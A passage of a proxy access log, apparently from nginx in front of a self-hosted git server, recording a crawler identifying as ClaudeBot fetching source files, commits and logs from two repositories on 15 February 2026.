"/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" [Client 216.73.216.188] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16481] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14210] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13940] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13888] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10083] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14667] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 216.73.216.188] [Length 22142] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 216.73.216.188] [Length 11850] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 216.73.216.188] [Length 12772] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 216.73.216.188] [Length 11304] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 15802] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 14930] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 216.73.216.188] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 15723] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 216.73.216.188] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html?display=source" [Client 216.73.216.188] [Length 22734] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 216.73.216.188] [Length 11263] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 216.73.216.188] [Length 14902] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10999] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 5772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 20103] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" [Client 216.73.216.188] [Length 10295] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" [Client 216.73.216.188] [Length 10139] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Findex.html" [Client 216.73.216.188] [Length 23981] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-4_error.log" [Client 216.73.216.188] [Length 25549] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Fproxy-host-3_error.log" [Client 216.73.216.188] [Length 20322] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 10142] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 10141] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs%2Ffallback_http_access.log" [Client 216.73.216.188] [Length 26935] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 216.73.216.188] [Length 11453] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 980605] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 216.73.216.188] [Length 10147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 19079] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14866] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 10941] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16087] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" [Client 216.73.216.188] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" [Client 216.73.216.188] [Length 10086] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16520] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js?display=source" [Client 216.73.216.188] [Length 24076] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:22:23 +0000] - 200 200 - GET https 